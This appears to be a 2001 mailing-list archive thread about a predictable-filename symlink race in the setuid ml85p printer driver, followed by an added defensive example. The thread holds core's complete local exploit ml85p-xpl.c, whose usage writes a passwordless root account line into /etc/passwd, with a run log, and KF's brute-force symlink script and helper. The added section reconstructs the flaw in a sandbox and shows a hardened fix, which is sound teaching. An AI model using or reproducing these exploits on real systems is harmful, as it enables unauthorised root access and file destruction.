Hey kev... I downloaded the source for this and have it compiled...

Check this out

[-(core@devastator:~/bleedingedge)> ./ml85p-xpl /etc/rc.owned by_core
ml85p-xpl.c by core (c) 2001
> backing up /etc/rc.owned to /tmp/ez.TMwyqr
/bin/cp: cannot stat `/etc/rc.owned': No such file or directory
/bin/touch: getting attributes of `/etc/rc.owned': No such file or directory
> creating a lot of symlinks
Running a few times since I'm lazy.
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
Wrong file format.
file position: 8
ml85p: no process killed
-rw-rw-r-- 1 root staff 0 Jul 10 12:16 /etc/rc.owned
> cleaning up
All done. Enjoy!

Wanna play with it a bit more but we should publish it to bugtraq soon.

/* ml85p-xpl.c
 *
 * Quick hack to exploit ml85p
 *
 * Simply run it with the file you want to create/overwrite
 * and the data you wish to place in the file.
 *
 * Example:
 *
 * $ gcc -g -Wall ml85p-xpl.c -o ml85p-xpl
 * $ ./ml85p-xpl /etc/passwd owned::0:0::/root:/bin/bash
 *
 * Then login as owned... etc..
 *
 * by Charles Stevenson <coreat_private>
 *
 * July 10 2001
 *
 * shoutz b10z
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <time.h>

#define TEMPFILE "/tmp/ez.XXXXXX"
#define BRUTE 10

void usage(char*);

int main(int argc, char **argv){
  char tempfile[128] = TEMPFILE;
  int fd, i;
  time_t the_time;
  char temp[512];

  if (argc < 3){
    usage(argv[0]);
  }

  /* the backup file gets an unpredictable name via mkstemp() */
  if((fd = mkstemp(tempfile))==-1){
    fprintf(stderr, "Error creating %s!\n",tempfile);
    exit(1);
  }

  /* begin lazy slacker coding */
  fprintf(stderr, "ml85p-xpl.c by core (c) 2001\n");
  fprintf(stderr, "> backing up %s to %s\n", argv[1], tempfile);

  /* backup old file */
  sprintf(temp, "/bin/cp %s %s", argv[1], tempfile);
  system(temp);

  /* set the date/time */
  sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile);
  system(temp);

  the_time = time(NULL);

  /* ml85p names its spool file after the current time, so plant a
   * symlink to the target at each of the next BRUTE candidate names */
  fprintf(stderr, "> creating a lot of symlinks\n");
  for (i=0;i<BRUTE;i++){
    /* BAD CODE: sprintf(gname,"/tmp/ml85g%d",time(0)); */
    sprintf(temp, "/tmp/ml85g%d", the_time+i);
    symlink(argv[1], temp);
  }

  /* feed the data as a print job; ml85p writes it through the symlink */
  sprintf(temp, "/bin/echo `perl -e 'print \"\\n\"'`%s > file; ml85p -sf file 2>&1>/dev/null & sleep 1; killall ml85p\n", argv[2]);

  fprintf(stderr, "Running a few times since I'm lazy.\n");
  for (i=0;i<BRUTE;i++){
    system(temp);
    //sleep(1);
  }

  sprintf(temp, "/bin/ls -l %s", argv[1]);
  system(temp);

  fprintf(stderr, "> cleaning up\n");
  sprintf(temp, "/bin/rm -f /tmp/ml85*");
  system(temp);

  fprintf(stderr, "All done. Enjoy!\n");
  return 0;
}

void usage(char *name){
  fprintf(stderr, "usage: %s <filename> <data>\n", name);
  exit(1);
}

/* EOF */

Best Regards,
Charles Stevenson (b10z ownz :)

> [401070dd] iopl(0x3) = 0
> [400cf2bd] time(NULL) = 994462668
> [40100cbf] brk(0) = 0x8064544
> [40100cbf] brk(0x80646c4) = 0x80646c4
> [40100cbf] brk(0x8065000) = 0x8065000
> [400fa484] open("/tmp/ml85g994462668", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3

I might have to hack the code to get that far since I don't have the printer.
> I am not sure what other OSes pick for permissions by default...
> mandrake seems to not allow user access by default ... I don't know
> what group you need to have access to use this feature.

You can change the umask.

> [d0tslash@linux d0tslash]$ /usr/bin/ml85p
> bash: /usr/bin/ml85p: Permission denied
>
> [d0tslash@linux d0tslash]$ ls -al /usr/bin/ml85p
> -rwsr-x--- 1 root sys 11676 Mar 30 11:43 /usr/bin/ml85p*
>
> for shits and giggles let's see what happens if it's got bad perms.
> [root@linux exp]# chmod 4755 /usr/bin/ml85p

If it's installed from the tarball the perms are ok for sploitin'

[-(core@devastator:~/bleedingedge/ml85p-driver)> ls -l `which ml85p`
-r-sr-sr-x 1 root staff 11196 Jul 10 11:25 /usr/local/bin/ml85p

> in which case the results are as follows
>
> [d0tslash@linux d0tslash]$ /usr/bin/ml85p -s (several times)
> -rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463605
> -rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463607
> -rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463608
> -rw-r--r-- 1 root d0tslash 0 Jul 6 19:53 ml85g994463609
>
> [d0tslash@linux d0tslash]$ cat ml85p-exp.c
> // ln -s /etc/oops /tmp/ml85`./ml85p-exp`
>
> #include <time.h>
> #include <stdio.h>
>
> /* prints the time 30 seconds from now, i.e. a predicted spool file name */
> int main(int argc, char **argv)
> {
>   int x = time(NULL);
>   x = x + 30;
>   printf("%i\n", x);
>   return 0;
> }
>
> [d0tslash@linux d0tslash]$ cat ml85p.sh
> #!/bin/bash
> # krfinisterreat_private
> echo "brute.sh <low> <hi>"
> L=$1
> H=$2
> while [ $L -lt $H ]
> do
>   ln -s /etc/oops /tmp/ml85g`./ml85p-exp`
>   let L=L+1
> done
>
> the following file is created.
> -rw-r--r-- 1 root d0tslash 0 Jul 6 20:18 /etc/oops
>
> not sure what use this is short of clobbering files... since the output is
> sent to this file it may be possible to print
> owned::0:0:root:/root:/bin/bash to this driver and it may append it to the
> file in /tmp... I am not sure though... just an idea
>
> -KF
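Added example for this archive page; it is not code from core, KF or the ml85p driver. It reconstructs the spool-file opener implied by the thread (the "BAD CODE" comment in ml85p-xpl.c and the traced open("/tmp/ml85g<time>", O_RDWR|O_CREAT|O_TRUNC, 0666)) and puts a hardened opener next to it, then replays the symlink race that KF's brute.sh and core's ml85p-xpl.c set up against the real binary. The scratch directory, the victim file contents and all function names are assumptions made for the demonstration; the scratch directory stands in for /tmp so the example runs unprivileged and cleans up after itself.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <time.h>
#include <unistd.h>

/* Vulnerable opener, reconstructed from the thread. The name is the current
 * time, so it can be predicted; without O_EXCL, open() follows a symlink that
 * already sits at that name, and O_TRUNC empties whatever it points at. */
int open_spool_vulnerable(const char *dir, time_t now)
{
    char path[PATH_MAX];
    snprintf(path, sizeof path, "%s/ml85g%ld", dir, (long)now);
    return open(path, O_RDWR | O_CREAT | O_TRUNC, 0666);
}

/* Hardened opener (added here, not ml85p's actual fix). It keeps the same
 * predictable name on purpose, to show that O_CREAT|O_EXCL alone defeats a
 * planted symlink: POSIX requires that combination to fail when the path is a
 * symlink, whatever it points at. O_NOFOLLOW is a second line of defence, the
 * mode is 0600, and fstat() confirms we hold a fresh regular file. */
int open_spool_safe(const char *dir, time_t now)
{
    char path[PATH_MAX];
    struct stat st;
    int fd;

    snprintf(path, sizeof path, "%s/ml85g%ld", dir, (long)now);
    fd = open(path, O_RDWR | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd == -1)
        return -1;
    if (fstat(fd, &st) == -1 || !S_ISREG(st.st_mode) || st.st_nlink != 1 || st.st_size != 0) {
        close(fd);
        return -1;
    }
    return fd;
}

enum { SETUP_FAILED = -1, OPEN_REFUSED = 0, VICTIM_INTACT = 1, VICTIM_CLOBBERED = 2 };

static void cleanup(const char *dir, const char *target, const char *spool)
{
    unlink(spool);   /* removes the planted symlink or the genuine spool file */
    unlink(target);
    rmdir(dir);
}

/* Replays the race: the attacker plants a symlink at the predicted spool name,
 * then the "driver" opens its spool file and writes the print job into it. */
int simulate_attack(int (*opener)(const char *, time_t), int plant_symlink)
{
    char dir[PATH_MAX], target[PATH_MAX], spool[PATH_MAX];
    const char *original = "root:x:0:0:root:/root:/bin/bash\n"; /* constructed stand-in for /etc/passwd */
    const char *job = "owned::0:0::/root:/bin/bash\n";          /* the line core's exploit injects */
    struct stat st;
    time_t now = time(NULL);
    int fd, result;

    strcpy(dir, "/tmp/ml85demo.XXXXXX");                         /* scratch area standing in for /tmp */
    if (!mkdtemp(dir)) {
        strcpy(dir, "./ml85demo.XXXXXX");
        if (!mkdtemp(dir))
            return SETUP_FAILED;
    }
    snprintf(target, sizeof target, "%s/victim", dir);
    snprintf(spool, sizeof spool, "%s/ml85g%ld", dir, (long)now);

    fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd == -1 || write(fd, original, strlen(original)) != (ssize_t)strlen(original)) {
        if (fd != -1) close(fd);
        cleanup(dir, target, spool);
        return SETUP_FAILED;
    }
    close(fd);

    if (plant_symlink && symlink(target, spool) == -1) {        /* attacker's move */
        cleanup(dir, target, spool);
        return SETUP_FAILED;
    }

    fd = opener(dir, now);                                      /* setuid driver's move */
    if (fd >= 0) {
        (void)write(fd, job, strlen(job));
        close(fd);
    }

    if (stat(target, &st) != 0 || st.st_size != (off_t)strlen(original))
        result = VICTIM_CLOBBERED;
    else
        result = fd >= 0 ? VICTIM_INTACT : OPEN_REFUSED;

    cleanup(dir, target, spool);
    return result;
}

int main(void)
{
    printf("vulnerable opener, symlink planted: %d (2 = victim clobbered)\n", simulate_attack(open_spool_vulnerable, 1));
    printf("hardened opener,   symlink planted: %d (0 = open refused)\n", simulate_attack(open_spool_safe, 1));
    printf("hardened opener,   no symlink:      %d (1 = spool created, victim intact)\n", simulate_attack(open_spool_safe, 0));
    return 0;
}
```

The vulnerable opener loses the victim's contents even though the driver only ever intended to write to its own spool file, which is the whole of what ml85p-xpl.c exploits; the hardened opener fails closed on the planted link and still works when nothing has been planted. In practice the usual fix is the one core's own exploit uses for its backup copy: mkstemp(), which picks an unpredictable name and opens it with O_EXCL in a single call, so the attacker cannot guess the name in the first place.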
This archive was generated by hypermail 2b30 : Tue Jul 10 2001 - 11:44:59 PDT